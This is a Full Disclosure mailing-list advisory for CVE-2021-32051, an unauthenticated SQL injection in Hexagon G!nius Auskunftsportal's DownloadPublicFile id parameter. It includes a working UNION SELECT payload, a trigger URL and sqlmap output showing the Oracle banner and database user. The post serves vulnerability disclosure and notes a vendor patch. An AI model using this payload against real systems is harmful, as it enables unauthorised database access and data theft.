[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
- From: Marcel Keiffenheim <marcel@xxxxxxxxxxxxxxx>
- Date: Mon, 10 May 2021 18:12:47 +0200 (CEST)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<div style="" class="default-style">
<div class="default-style">
CVE-2021-32051 Hexagon G!nius Auskunftsportal before 5.0.0.0 allows SQL
injection via the GiPWorkflow/Service/DownloadPublicFile id parameter.
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Additional Information]
<br>PoC Payload: id=test' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||
<br>CHR(107)||CHR(112)||CHR(122)||CHR(113)||CHR(107)||CHR(71)||CHR(98)||CHR(88)||CHR(104)||CHR(102)||CHR(99)||
<br>CHR(67)||CHR(113)||CHR(109)||CHR(69)||CHR(110)||CHR(67)||CHR(76)||CHR(103)||CHR(84)||CHR(83)||CHR(109)||
<br>CHR(121)||CHR(84)||CHR(73)||CHR(116)||CHR(79)||CHR(103)||CHR(87)||CHR(84)||CHR(120)||CHR(119)||CHR(75)||
<br>CHR(76)||CHR(114)||CHR(120)||CHR(103)||CHR(85)||CHR(87)||CHR(112)||CHR(111)||CHR(70)||CHR(108)||CHR(73)||
<br>CHR(113)||CHR(112)||CHR(113)||CHR(120)||CHR(113),NULL FROM DUAL-- LShX
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Result:
<br>====
<br>back-end DBMS: Oracle
<br>banner: 'Oracle Database 19c Standard Edition 2 Release 19.0.0.0.0 -
Production'
<br>current user: 'IPA_ADMIN'
<br>current database (equivalent to schema on Oracle): 'IPA_ADMIN'
<br>current user is DBA: False
<br>database management system users [18]:
<br>====
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Impact:
<br>Complete compromise of the database's data integrity.
</div>
<div class="default-style">
Discovery:
<br>1. Discovered manually
<br>2. Exploited via sqlmap
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Vulnerability Type]
<br>SQL Injection
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Vendor of Product]
<br>Hexagon AG
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Affected Product Code Base]
<br>G!nius Auskunftsportal - 5.0.0.0 (fixed)
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Affected Component]
<br>DownloadPublicFile component
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Attack Type]
<br>Remote
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Impact Information Disclosure]
<br>true
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
[Attack Vectors]
<br>The web application has a function ("DownloadPublicFile") which
facilitates downloads.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
The "id" parameter (used to specify which file is to be downloaded) is
vulnerable to SQL injection.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
This SQL injection attack surface allows the Oracle database backend to be
accessed and read without authentication by using a "UNION SELECT" payload.
<br>
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
Accessing the following URL will trigger an Oracle error message:
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
https://[affected site root]/GiPWorkflow/Service/DownloadPublicFile?id=DS'
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
The apostrophe at the end (Unicode U+0027) interrupts the application's
hard-coded SQL query.
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
At this point a "UNION SELECT" payload can be used to access any data
within the database.
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Has vendor confirmed or acknowledged the vulnerability?]
<br>true
</div>
<div class="default-style">
A patch has been developed, released and installed to all known instances
of the vulnerability a full six months prior to public disclosure.
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Discoverer]
<br>Marcel Keiffenheim
</div>
<div class="default-style">
------------------------------------------
</div>
<div class="default-style">
<br>
</div>
<div class="default-style">
[Reference]
<br>https://www.hexagonsafetyinfrastructure.com/products/utilities-and-communications-products/advanced-utility-gis/hexagon-ginius
</div>
</div>
</body>
</html>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/